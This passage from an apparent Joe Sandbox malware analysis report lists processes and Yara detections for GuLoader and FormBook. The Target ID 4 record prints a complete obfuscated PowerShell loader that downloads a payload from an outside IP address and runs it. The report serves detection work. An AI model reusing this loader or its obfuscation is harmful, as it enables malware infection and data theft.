.Es.uUb sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2218474708.0000024A90076000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:06:34:59
                                                                  Start date:24/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:06:35:01
                                                                  Start date:24/04/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"
                                                                  Imagebase:0x7ff676dc0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:06:35:08
                                                                  Start date:24/04/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;"
                                                                  Imagebase:0xd10000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2012139926.0000000008E80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2003727475.00000000062A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2012540272.000000000AC33000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:06:35:09
                                                                  Start date:24/04/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:06:35:24
                                                                  Start date:24/04/2024
                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                  Imagebase:0xd0000
                                                                  File size:516'608 bytes
                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2286239677.0000000023700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2286239677.0000000023700000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:06:35:50
                                                                  Start date:24/04/2024
                                                                  Path:C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe"
                                                                  Imagebase:0x150000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2945916928.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2945916928.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:11
                                                                  Start time:06:35:51
                                                                  Start date:24/04/2024
                                                                  Path:C:\Windows\SysWOW64\AtBroker.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\AtBroker.exe"
                                                                  Imagebase:0xf10000
                                                                  File size:68'608 bytes
                                                                  MD5 hash:D5B61959A509BDA85300781F5A829610
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2945907117.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2945907117.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:12
                                                                  Start time:06:36:05
                                                                  Start date:24/04/2024
                                                                  Path:C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe"
                                                                  Imagebase:0x150000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2945047764.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2945047764.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:13
                                                                  Start time:06:36:08
                                                                  Start date:24/04/2024
                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                  Imagebase:0xd0000
                                                                  File size:516'608 bytes
                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:06:36:08
                                                                  Start date:24/04/2024
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                  Imagebase:0x7ff628be0000
                                                                  File size:71'680 bytes
                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:06:36:16
                                                                  Start date:24/04/2024
                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                  Imagebase:0xd0000
                                                                  File size:516'608 bytes
                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:06:36:16
                                                                  Start date:24/04/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6bf500000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2256937873.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dec322d08de64d11071a0df99f9f901165d8e62462e8717f66b3213d1c64fab1
                                                                    • Instruction ID: 4080cadede46f70aa79e36bdda845e5fda1356445a9c19b2cc4c6f4828eef0f2
                                                                    • Opcode Fuzzy Hash: dec322d08de64d11071a0df99f9f901165d8e62462e8717f66b3213d1c64fab1
                                                                    • Instruction Fuzzy Hash: 68F1B730A0DA8D8FEBA8DF28C8597E937D1FF58314F04426EE84DC72A5DB3499458B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2256937873.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1089fb4d94cf6ba7255e120f8230b31023464c35c14b8e23171df9e550aa36b9
                                                                    • Instruction ID: 1f8dc7488b64a45b2edfebf19442b98737f2b91eec21045f3a158761d0131a58
                                                                    • Opcode Fuzzy Hash: 1089fb4d94cf6ba7255e120f8230b31023464c35c14b8e23171df9e550aa36b9
                                                                    • Instruction Fuzzy Hash: 34E1E470A0DA8D8FEBA8DF28C8A57E977D1FF58310F04426ED84DC72A5DE7899408781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2258538801.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5845d3b96c6d6e1c1ac8149ef7c56d22afbe3a51c99543d9f8237a0f337c8ee4
                                                                    • Instruction ID: c72980ad900c515d46a09d50a52c225f9404ee7686bed3bc7ba6ee4d1461a012
                                                                    • Opcode Fuzzy Hash: 5845d3b96c6d6e1c1ac8149ef7c56d22afbe3a51c99543d9f8237a0f337c8ee4
                                                                    • Instruction Fuzzy Hash: 20E13732B1FA9E1FE7A5DBAC48786B97BD2EF55314F1901BAD05DC71E2DA189C018301
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2258538801.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c38061aaf2297c087f15f80dc52f56c9e4760f1287eaf9fab89b9aa842c3472c
                                                                    • Instruction ID: a598af0d8e9856b2f794ee96164e7a4e3d5047cb7d85dcd7ec30705558bb9d09
                                                                    • Opcode Fuzzy Hash: c38061aaf2297c087f15f80dc52f56c9e4760f1287eaf9fab89b9aa842c3472c
                                                                    • Instruction Fuzzy Hash: 6ED17832A1FADD1FE7A597A848606B97BA2EF51310B0901FED05CCB2E3ED18A801C351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2258538801.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7f45dc2a30890e3cd78c641f1b5835889b3a3fefdcd2bf9f495b07bae009427e
                                                                    • Instruction ID: 4215befd8bf42f3bbd0b29ae66c0839720aa45bdb98adb39cd86293f5a20f83a
                                                                    • Opcode Fuzzy Hash: 7f45dc2a30890e3cd78c641f1b5835889b3a3fefdcd2bf9f495b07bae009427e
                                                                    • Instruction Fuzzy Hash: 3F512322B2FA9E1FE7A5DB9D48786B87BD2EF50254B5900FAD05CC71E3DD29AC448301
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2256937873.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                                    • Instruction ID: eb7a46cdb0012eff6e5c38bb0d8d527c599f3350d087005d384069ff07837e75
                                                                    • Opcode Fuzzy Hash: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                                    • Instruction Fuzzy Hash: FD01A73020CB0C4FD748EF0CE451AA5B3E0FB89324F10056DE58AC36A1D632E882CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2256937873.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c072505c8f08ea8efa5ce37d6ceb87473ba63b0bfdc4b879836b8c08bbd56907
                                                                    • Instruction ID: 14915cfacf9ba1d4405bc99e012095a6928d7546ead34f6604041f362e9c9e93
                                                                    • Opcode Fuzzy Hash: c072505c8f08ea8efa5ce37d6ceb87473ba63b0bfdc4b879836b8c08bbd56907
                                                                    • Instruction Fuzzy Hash: 2D318777B091625EE319F7ADF8F68EA3B54DFC123930901B7D1D9C60A3E918114B91A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \Vjj
                                                                    • API String ID: 0-4208670319
                                                                    • Opcode ID: 940e89e86880ab2f75bbee27cf27fed731daded90dc85310c59c9c7a7cd02eb0
                                                                    • Instruction ID: bf5ab55586f9ee0482f5c9d66eb2963521d1d33a68b43f1c3399a60f23508aaa
                                                                    • Opcode Fuzzy Hash: 940e89e86880ab2f75bbee27cf27fed731daded90dc85310c59c9c7a7cd02eb0
                                                                    • Instruction Fuzzy Hash: 26B13770E00209CFDF14CFA9D9857AEBBF2BF88315F14812DD815A7695EB789846CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2011591150.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8ac0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d26c6037ab99337d1d716546d29db55ad1ec21ea47619af4f7dcd17d8755e53b
                                                                    • Instruction ID: 0bace6d169f6f383aa81ad1703ff79f783b85c6c2fec7bf10951ceb8c77ff36f
                                                                    • Opcode Fuzzy Hash: d26c6037ab99337d1d716546d29db55ad1ec21ea47619af4f7dcd17d8755e53b
                                                                    • Instruction Fuzzy Hash: DBB15B70F00209CFDB14CFA9D9817ADBBF2AF88315F14852DE415EB695EB749842CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$(fvl$(fvl$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.gk$-gk
                                                                    • API String ID: 0-909026888
                                                                    • Opcode ID: 756f6b47d4cabc694316afa74d6ade6e90fa041c62959fba0993d742175a0d88
                                                                    • Instruction ID: 4b15b35ec32a45643e0dda8e14460ba046db96d848225dabe48b99725234cd94
                                                                    • Opcode Fuzzy Hash: 756f6b47d4cabc694316afa74d6ade6e90fa041c62959fba0993d742175a0d88
                                                                    • Instruction Fuzzy Hash: 0F3290B0A01215DFDB24DF64D851BAFBBB2AF85304F10D4A9D9096B785CB32BD81CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl
                                                                    • API String ID: 0-3038533570
                                                                    • Opcode ID: f38bad2fae59b86928504547467e508124a44d96f170c745716b895cd4428698
                                                                    • Instruction ID: f071bc6196159a288f980694b14224378627110dcc7a4a6aff5ac527eea2f54d
                                                                    • Opcode Fuzzy Hash: f38bad2fae59b86928504547467e508124a44d96f170c745716b895cd4428698
                                                                    • Instruction Fuzzy Hash: 7D628CB4B11205CFDB14CF98C551AAABBF2AF89308F54C069D909AF755CB72EC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.gk$-gk
                                                                    • API String ID: 0-915389705
                                                                    • Opcode ID: bb6205b0857a05f97c61f52d132989ec350a5a67c4c11765e56fe902c218b047
                                                                    • Instruction ID: fde3c823c9a21be28edc3cc861172d55630cfed60994f01128e1e4430a6e3c84
                                                                    • Opcode Fuzzy Hash: bb6205b0857a05f97c61f52d132989ec350a5a67c4c11765e56fe902c218b047
                                                                    • Instruction Fuzzy Hash: 8CD1F3B0A412049FCB14DFA8D555BAEBBB3AF88315F20C069D9056F785CB35EC82CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$4'dq$4'dq$x.gk$x.gk$-gk
                                                                    • API String ID: 0-3188241317
                                                                    • Opcode ID: 1ee6896fc0ef1aab44b26cb378f20b2d886b6a3154977415238c114abbdba48f
                                                                    • Instruction ID: 8a0b60f746184ae3974f0a2d7512e2c46ca350b47f396d149160b663042d4375
                                                                    • Opcode Fuzzy Hash: 1ee6896fc0ef1aab44b26cb378f20b2d886b6a3154977415238c114abbdba48f
                                                                    • Instruction Fuzzy Hash: C2F1A1B0A012159FD724EB28C951FAEBBB3AF84304F50C0A5E9096F795CB75AD81CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fvl$(fvl$(fvl$(fvl$`Bhk
                                                                    • API String ID: 0-921259589
                                                                    • Opcode ID: db8ca198ba72b90aa0b2ca2ed984dcb1a8a728ffa0cfadf45e78cf65138df6cd
                                                                    • Instruction ID: 8b0458d8361cd561dc25263c24c4b9f8abf04050bcf9a3b7efeece39696035fb
                                                                    • Opcode Fuzzy Hash: db8ca198ba72b90aa0b2ca2ed984dcb1a8a728ffa0cfadf45e78cf65138df6cd
                                                                    • Instruction Fuzzy Hash: 45C1A0B0B012089FCB14DB58D951FAEBBF2AF85704F14C069D9099F795DA72EC82CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2009217687.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7e40000_powershell.jbxd
